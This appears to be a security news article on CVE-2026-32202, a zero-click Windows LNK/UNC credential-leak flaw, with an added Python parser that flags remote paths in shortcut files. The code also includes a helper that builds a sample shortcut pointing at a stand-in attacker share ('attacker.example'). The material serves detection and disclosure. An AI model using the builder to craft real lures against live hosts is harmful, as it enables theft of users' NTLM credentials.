Microsoft Confirms Active Exploitation of CVE-2026-32202: Windows Shell Spoofing Bug Under Attack
Microsoft has confirmed that CVE-2026-32202, a Windows Shell spoofing vulnerability patched in April 2026, is being actively exploited in the wild as a zero-click credential theft vector.

Microsoft on Monday revised its advisory for CVE-2026-32202, a Windows Shell spoofing vulnerability (CVSS 4.3) patched in the April 2026 Patch Tuesday update, to confirm active exploitation in the wild. The flaw, discovered and reported by Akamai security researcher Maor Dahan, stems from an incomplete fix for CVE-2026-21510 — a vulnerability previously weaponized by Russian state-sponsored group APT28 (Fancy Bear) in attacks targeting Ukraine and EU nations.
The vulnerability allows an attacker to coerce a victim's machine into leaking NTLM credentials without any user interaction. When Windows parses a malicious Windows Shortcut (LNK) file that references a Universal Naming Convention (UNC) path (e.g., `\\attacker.com\share\payload.cpl`), which Explorer does automatically when the shortcut is displayed, without the user opening it, the system initiates an SMB connection to the attacker's server. The server demands authentication and Windows answers with the logged-on user's Net-NTLMv2 response (commonly called the Net-NTLMv2 hash), which the attacker captures. That response is bound to the server's challenge, so it cannot be replayed directly, but it can be relayed in real time to another NTLM-accepting service or cracked offline to recover the password.
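To make the mechanism concrete, the following Python is an added example, not Akamai's or Microsoft's code. It parses the MS-SHLLINK structures that can carry a path (LinkInfo, StringData and the Environment ExtraData blocks) and reports every field that points at a UNC share, which is what makes Explorer reach out over SMB while merely parsing the shortcut. The sample shortcut is constructed inside the code, and the host name `attacker.example` is an assumption for illustration.

```python
"""Find remote (UNC) references inside Windows Shell Link (.lnk) files.

Added example, not Akamai's or Microsoft's code. Any path that begins with
two backslashes makes Explorer open an SMB connection and send an NTLM
response while the shortcut is parsed, so those are the fields to flag.
"""
import struct

# LinkCLSID {00021401-0000-0000-C000-000000000046} in its on-disk byte order
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
# LinkFlags bits this parser needs
HAS_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_RELATIVE_PATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKING_DIR, HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
ENV_BLOCK, ICON_ENV_BLOCK = 0xA0000001, 0xA0000007  # ExtraData block signatures


def _cstr(data: bytes, off: int) -> str:
    """Null-terminated ANSI string starting at offset off."""
    return data[off:data.index(b"\0", off)].decode("cp1252")


def parse_lnk(data: bytes) -> dict:
    """Return every path-like string the shortcut carries, keyed by the field it came from."""
    hdr_size, clsid, flags = struct.unpack_from("<I16sI", data, 0)
    if hdr_size != 0x4C or clsid != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    pos, found = 0x4C, {}
    if flags & HAS_ID_LIST:                      # skip the LinkTargetIDList (not decoded here)
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:
        li = pos
        li_size, _hdr, li_flags, _vol, local_off, cnrl_off, suffix_off = struct.unpack_from("<7I", data, li)
        if li_flags & 0x1:                       # VolumeIDAndLocalBasePath
            found["local_base_path"] = _cstr(data, li + local_off)
        if li_flags & 0x2:                       # CommonNetworkRelativeLinkAndPathSuffix
            cnrl = li + cnrl_off
            netname_off = struct.unpack_from("<5I", data, cnrl)[2]
            found["network_target"] = _cstr(data, cnrl + netname_off) + "\\" + _cstr(data, li + suffix_off)
        pos += li_size
    unicode = bool(flags & IS_UNICODE)
    for bit, name in ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                      (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                      (HAS_ICON_LOCATION, "icon_location")):
        if flags & bit:                          # StringData: CountCharacters + chars, no terminator
            count = struct.unpack_from("<H", data, pos)[0]
            width = 2 if unicode else 1
            found[name] = data[pos + 2:pos + 2 + count * width].decode("utf-16-le" if unicode else "cp1252")
            pos += 2 + count * width
    while pos + 8 <= len(data):                  # ExtraData blocks until a TerminalBlock (size < 4)
        size, sig = struct.unpack_from("<II", data, pos)
        if size < 4:
            break
        if sig in (ENV_BLOCK, ICON_ENV_BLOCK):   # TargetAnsi[260] followed by TargetUnicode[520]
            ansi = data[pos + 8:pos + 268].split(b"\0", 1)[0].decode("cp1252")
            uni = data[pos + 268:pos + 788].decode("utf-16-le").split("\0", 1)[0]
            found["env_target" if sig == ENV_BLOCK else "icon_env_target"] = uni or ansi
        pos += size
    return found


def remote_references(data: bytes) -> dict:
    """Only the fields whose value is a UNC path, i.e. what would make Explorer dial out."""
    # \\?\ and \\.\ are local device-path prefixes, not remote shares, so they are excluded
    return {k: v for k, v in parse_lnk(data).items()
            if v.startswith("\\\\") and not v.startswith(("\\\\?\\", "\\\\.\\"))}


def build_lnk(unc_target: str, icon: str = "", env_target: str = "") -> bytes:
    """Constructed sample for testing: a minimal shortcut whose LinkInfo target is a UNC share."""
    server_share, _, suffix = unc_target.rpartition("\\")
    net, suf = server_share.encode("cp1252") + b"\0", suffix.encode("cp1252") + b"\0"
    cnrl = struct.pack("<5I", 0x14 + len(net), 0, 0x14, 0, 0) + net      # CommonNetworkRelativeLink
    link_info = struct.pack("<7I", 0x1C + len(cnrl) + len(suf), 0x1C, 0x2, 0, 0,
                            0x1C, 0x1C + len(cnrl)) + cnrl + suf
    flags = HAS_LINK_INFO | IS_UNICODE | (HAS_ICON_LOCATION if icon else 0)
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID, flags, 0x80, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0)
    strings = struct.pack("<H", len(icon)) + icon.encode("utf-16-le") if icon else b""
    extra = b""
    if env_target:                               # EnvironmentVariableDataBlock, fixed size 0x314
        extra = (struct.pack("<II", 788, ENV_BLOCK) + env_target.encode("cp1252").ljust(260, b"\0")
                 + env_target.encode("utf-16-le").ljust(520, b"\0"))
    return header + link_info + strings + extra + b"\0\0\0\0"            # TerminalBlock


if __name__ == "__main__":
    # attacker.example is an assumed host name; the shortcut is constructed, not a real sample
    sample = build_lnk(r"\\attacker.example\share\payload.cpl",
                       icon=r"\\attacker.example\share\icon.ico",
                       env_target=r"C:\Windows\System32\notepad.exe")
    for field, value in remote_references(sample).items():
        print(f"remote reference in {field}: {value}")
```

Run over shortcuts collected from mail attachments or file shares, this gives the list of hosts a shortcut would contact during parsing. The `icon_location` field matters as much as the target, because the icon is resolved when the file is only displayed. The example does not decode the ItemIDList, which can also hold a target; a complete triage tool would parse that as well.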
Akamai's Dahan explained that while Microsoft's February 2026 patch for CVE-2026-21510 mitigated the remote code execution risk by adding a SmartScreen check on the Control Panel (CPL) file's digital signature and origin zone, it still allowed the victim machine to authenticate to the attacker's server and fetch the CPL file automatically. "While Microsoft fixed the initial RCE (CVE-2026-21510), an authentication coercion flaw (CVE-2026-32202) remained. This gap between path resolution and trust verification left a zero-click credential theft vector via auto-parsed LNK files," Dahan noted.
The original CVE-2026-21510 and a related MSHTML Framework flaw (CVE-2026-21513) were both exploited by APT28 in December 2025 as part of an exploit chain that bypassed Microsoft Defender SmartScreen. The campaign leveraged malicious LNK files to load a DLL from a remote server using a UNC path, with the DLL loaded as part of CPL objects without proper network zone validation.
Microsoft acknowledged that the initial advisory for CVE-2026-32202 published on April 14 contained incorrect Exploitability Index, Exploited flag and CVSS vector information, which it corrected on April 27. The company did not share specific details about the current exploitation activity, but the confirmation of active exploitation raises the urgency for organizations to apply the April 2026 security updates.
The vulnerability affects all supported versions of Windows, and while the CVSS score is relatively low at 4.3, the zero-click nature of the attack and the potential for credential theft make it a significant threat. Security teams are advised to prioritize patching and monitor for outbound SMB connections (TCP 445) to external hosts that coincide with LNK files being displayed or opened. Blocking outbound SMB at the network edge and restricting outgoing NTLM authentication to remote servers through the Network security: Restrict NTLM policies limit the damage on hosts that have not yet been patched.